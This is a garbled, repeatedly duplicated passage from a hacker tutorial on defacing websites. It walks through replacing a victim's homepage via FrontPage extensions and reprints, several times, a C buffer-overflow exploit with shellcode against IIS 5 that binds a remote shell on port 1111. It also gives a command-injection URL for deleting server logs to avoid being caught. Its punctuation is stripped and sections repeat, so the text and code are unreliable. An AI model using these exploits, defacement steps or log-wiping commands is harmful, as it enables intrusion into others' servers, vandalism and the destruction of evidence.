xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 15
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 16
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
